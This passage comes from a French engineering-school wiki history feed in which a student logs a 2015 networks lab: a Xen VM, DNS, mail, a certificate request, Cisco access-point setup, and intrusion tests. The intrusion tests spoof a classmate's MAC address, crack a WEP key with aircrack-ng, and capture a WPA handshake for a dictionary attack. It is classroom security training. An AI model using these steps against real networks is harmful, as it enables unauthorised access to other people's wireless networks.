Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
service bind9 stop&lt;br /&gt;
service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 #newaliases&lt;br /&gt;
 #mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@chien:~#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;b) Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ls&lt;br /&gt;
aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;c) Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 - creation d'un dictionaire :&lt;br /&gt;
code C:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23127</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23127"/>
				<updated>2015-11-22T17:32:10Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Projet Système &amp;amp; Réseaux  IMA2A S9 &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
on est bien connecté :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wlan0     IEEE 802.11bgn  ESSID:&amp;quot;T2&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.447 GHz  Access Point: C4:14:3C:12:EA:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:1111-1111-11&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=70/70  Signal level=-38 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:4104   Missed beacon:0&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Installation des systèmes d'exploitation &amp;lt;/h1&amp;gt;&lt;br /&gt;
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.&lt;br /&gt;
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.&lt;br /&gt;
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. &lt;br /&gt;
  &lt;br /&gt;
&amp;lt;h2&amp;gt;Installation de la machine virtuel&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie concerne l’installation du machine virtuel Xen.&lt;br /&gt;
Nous installons Xen car celui-ci permet de faire de la  paravirtualisation. &lt;br /&gt;
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps &lt;br /&gt;
&lt;br /&gt;
Les étapes a suivre pour l’installation de Xen sur cordouan:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Conexion au serveur &lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
// Création de la Machine virtuel ( nom : chien)&lt;br /&gt;
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
// On observe la virtualisation&lt;br /&gt;
tail -f /var/log/xen-tools/chien.log&lt;br /&gt;
&lt;br /&gt;
root@cordouan:~# cd /etc/xen/&lt;br /&gt;
root@cordouan:/etc/xen# vim chien.cfg &lt;br /&gt;
// on met plus de memoire  =&amp;gt; 1024&lt;br /&gt;
// conexion en mode bridge=IMA2a&lt;br /&gt;
&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
if down eth0 &lt;br /&gt;
ifup etho&lt;br /&gt;
apt-get purge network-manage systemd &lt;br /&gt;
/etc/inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
